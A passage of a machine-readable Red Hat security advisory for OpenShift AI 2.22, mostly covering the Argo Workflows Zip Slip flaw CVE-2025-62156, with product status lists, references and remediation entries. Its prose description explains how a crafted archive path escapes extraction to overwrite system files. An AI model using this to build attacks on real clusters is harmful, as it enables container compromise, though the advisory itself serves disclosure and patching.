"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "axios: Axios DoS via lack of data size check"
},
{
"cve": "CVE-2025-62156",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2025-10-14T15:02:10.015356+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2403800"
}
],
"notes": [
{
"category": "description",
"text": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Versions prior to 3.6.12 and versions 3.7.0 through 3.7.2 contain a Zip Slip path traversal vulnerability in artifact extraction. During artifact extraction the unpack/untar logic (workflow/executor/executor.go) uses filepath.Join(dest, filepath.Clean(header.Name)) without validating that header.Name stays within the intended extraction directory. A malicious archive entry can supply a traversal or absolute path that, after cleaning, overrides the destination directory and causes files to be written outside the /work/tmp extraction path and into system directories such as /etc inside the container. The vulnerability enables arbitrary file creation or overwrite in system configuration locations (for example /etc/passwd, /etc/hosts, /etc/crontab), which can lead to privilege escalation or persistence within the affected container. Update to 3.6.12 or 3.7.3 to remediate the issue.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/argoproj/argo-workflows: Argo Workflows Zip Slip",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-62156"
},
{
"category": "external",
"summary": "RHBZ#2403800",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2403800"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-62156",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62156"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-62156",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62156"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/blob/946a2d6b9ac3309371fe47f49ae94c33ca7d488d/workflow/executor/executor.go#L993",
"url": "https://github.com/argoproj/argo-workflows/blob/946a2d6b9ac3309371fe47f49ae94c33ca7d488d/workflow/executor/executor.go#L993"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/commit/5659ad9b641fcf52c04ed594cd6493f9170f6011",
"url": "https://github.com/argoproj/argo-workflows/commit/5659ad9b641fcf52c04ed594cd6493f9170f6011"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/commit/9f6bc5d236cd1b24d607943384511d71ad17a4c3",
"url": "https://github.com/argoproj/argo-workflows/commit/9f6bc5d236cd1b24d607943384511d71ad17a4c3"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-p84v-gxvw-73pf",
"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-p84v-gxvw-73pf"
}
],
"release_date": "2025-10-14T14:52:44.502000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
